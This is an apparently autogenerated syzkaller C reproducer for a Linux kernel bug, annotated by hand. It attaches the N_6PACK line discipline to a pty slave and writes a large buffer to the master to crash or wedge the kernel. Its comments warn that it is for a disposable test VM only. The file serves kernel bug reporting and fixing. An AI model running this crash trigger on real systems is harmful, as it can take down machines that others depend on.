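// https://syzkaller.appspot.com/bug?id=1708e7a511059b09d2d4136150d3e67ff9dcf25f
// autogenerated by syzkaller (https://github.com/google/syzkaller)
//
// Kernel crash reproducer. It opens a pty pair, switches the slave to line
// discipline 7 (N_6PACK in Linux's uapi headers) and then pushes a 0xffa8-byte
// write into the master. Run it ONLY inside a disposable VM booted with the
// kernel under test: a successful run is expected to crash or wedge that
// kernel, and nothing here is safe to execute on a host you care about.
//
// Changes from the raw syzkaller output: the `#include` list (stripped by
// extraction) is restored, the fixed-address mmap is checked so a refused
// mapping does not turn every store below into a wild write, sprintf() is
// bounded, and the runs of byte stores are collapsed into memset()+stores
// that produce byte-identical memory.

#define _GNU_SOURCE

#include <endian.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

/* Scratch arena mapped at a fixed address; every syscall argument below is a
 * pointer into it. MAP_ANONYMOUS memory starts zero-filled, which the
 * memset()-then-store helpers rely on for the bytes syzkaller never wrote. */
#define SYZ_ARENA_BASE 0x20000000ul
#define SYZ_ARENA_SIZE 0x1000000ul

/* Open the pts slave that belongs to the pty master `a0`, with open(2) flags
 * `a1`. Returns the new fd, or -1 if TIOCGPTN or open() fails. `volatile` is
 * kept from the generated code so the arguments are not constant-folded. */
static long syz_open_pts(volatile long a0, volatile long a1)
{
  int ptyno = 0;
  char path[128];

  if (ioctl(a0, TIOCGPTN, &ptyno))
    return -1;
  /* "/dev/pts/%d" is at most 21 bytes for any int; bound it anyway. */
  snprintf(path, sizeof path, "/dev/pts/%d", ptyno);
  return open(path, a1, 0);
}

/* syzkaller resource table: r[0] = ptmx master fd, r[1] = pts slave fd.
 * -1 means the producing call failed; later calls are still issued on -1
 * exactly as generated (they then fail with EBADF). */
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};

/* Argument block at 0x200005c0 (80 bytes) for the ioctl(-1, 0x89a0) call.
 * Layout as generated: fe80::aa, fe80::bb, ::ffff:172.20.20.187 as three
 * 16-byte values, then a u32 of 2 and zeros. The ioctl never reaches the
 * kernel (fd -1), but these bytes lie inside the window written to the
 * master at the end of main(), so they are part of the trigger payload and
 * must be preserved verbatim. */
static void fill_sockios_arg(void)
{
  uint8_t *p = (uint8_t *)0x200005c0;

  memset(p, 0, 0x50);
  p[0x00] = 0xfe; p[0x01] = 0x80; p[0x0f] = 0xaa;
  p[0x10] = 0xfe; p[0x11] = 0x80; p[0x1f] = 0xbb;
  p[0x2a] = 0xff; p[0x2b] = 0xff;
  p[0x2c] = 0xac; p[0x2d] = 0x14; p[0x2e] = 0x14; p[0x2f] = 0xbb;
  *(uint32_t *)(p + 0x30) = 2;
}

/* msghdr (0x200001c0) -> iovec (0x20000300) -> netlink message (0x20000240)
 * for the sendmsg(-1, ...) call. nlmsg_type 0x14 with family 0xa and
 * attribute types 8 and 2 is how syzkaller generated it; as with
 * fill_sockios_arg() the call itself fails with EBADF, but the bytes sit
 * inside the final write window and are kept byte-for-byte. */
static void fill_netlink_msg(void)
{
  uint8_t *nl = (uint8_t *)0x20000240;
  uint8_t *iov = (uint8_t *)0x20000300;
  uint8_t *msg = (uint8_t *)0x200001c0;

  memset(nl, 0, 0x34);
  *(uint32_t *)(nl + 0x00) = 0x34;       /* nlmsg_len */
  *(uint16_t *)(nl + 0x04) = 0x14;       /* nlmsg_type */
  *(uint16_t *)(nl + 0x06) = 0x95b5;     /* nlmsg_flags */
  nl[0x10] = 0xa;                        /* ifa_family; rest of header zero */
  *(uint16_t *)(nl + 0x18) = 8;          /* attr 1: len 8, type 8, u32 value */
  *(uint16_t *)(nl + 0x1a) = 8;
  *(uint32_t *)(nl + 0x1c) = 0xae6b531f;
  *(uint16_t *)(nl + 0x20) = 0x14;       /* attr 2: len 0x14, type 2, 16 bytes */
  *(uint16_t *)(nl + 0x22) = 2;
  nl[0x2e] = 0xff; nl[0x2f] = 0xff;
  *(uint32_t *)(nl + 0x30) = htobe32(0);

  *(uint64_t *)(iov + 0x0) = 0x20000240;  /* iov_base */
  *(uint64_t *)(iov + 0x8) = 0x34;        /* iov_len */

  memset(msg, 0, 0x34);
  *(uint64_t *)(msg + 0x10) = 0x20000300; /* msg_iov */
  *(uint64_t *)(msg + 0x18) = 1;          /* msg_iovlen; name/control/flags zero */
}

int main(void)
{
  intptr_t res;

  /* 3 = PROT_READ|PROT_WRITE, 0x32 = MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED on
   * Linux. The generated code ignored the result; if the fixed mapping is
   * refused every store below faults, so report that instead. */
  res = syscall(__NR_mmap, SYZ_ARENA_BASE, SYZ_ARENA_SIZE, 3ul, 0x32ul, -1, 0);
  if (res == -1) {
    perror("mmap(0x20000000, MAP_FIXED)");
    return 1;
  }

  /* 1. Open the pty master. 0xff..ff9c is AT_FDCWD; flags 6 include O_RDWR. */
  memcpy((void *)0x20000040, "/dev/ptmx\000", 10);
  res = syscall(__NR_openat, 0xffffffffffffff9cul, 0x20000040ul, 6ul, 0ul);
  if (res != -1)
    r[0] = res;

  /* 2. ioctl 0x40045431 (TIOCSPTLCK) with *arg == 0: unlock the slave.
   *    36 zero bytes cover the int plus the padding syzkaller emitted. */
  memset((void *)0x203b9fdc, 0, 36);
  syscall(__NR_ioctl, r[0], 0x40045431ul, 0x203b9fdcul);

  /* 3. Open the slave (flags 0 = O_RDONLY). */
  res = syz_open_pts(r[0], 0);
  if (res != -1)
    r[1] = res;

  /* 4. ioctl 0x5423 (TIOCSETD) on the slave with discipline 7 (N_6PACK). */
  *(uint32_t *)0x20fd0ffc = 7;
  syscall(__NR_ioctl, r[1], 0x5423ul, 0x20fd0ffcul);

  /* 5-6. Both calls use fd -1 and fail with EBADF before touching any
   *    subsystem; they are kept so the arena contents they populate (part
   *    of the payload below) and the call sequence match the bug report. */
  fill_sockios_arg();
  syscall(__NR_ioctl, -1, 0x89a0ul, 0x200005c0ul);
  fill_netlink_msg();
  syscall(__NR_sendmsg, -1, 0x200001c0ul, 0ul);

  /* 7. The trigger: 0xffa8 bytes from 0x200000c0 (through 0x20010068, so
   *    the msghdr/netlink/ioctl bytes above are included; everything else
   *    in the window is zero) written into the master while the slave has
   *    N_6PACK attached. Its return value is irrelevant to the reproducer. */
  syscall(__NR_write, r[0], 0x200000c0ul, 0xffa8ul);
  return 0;
}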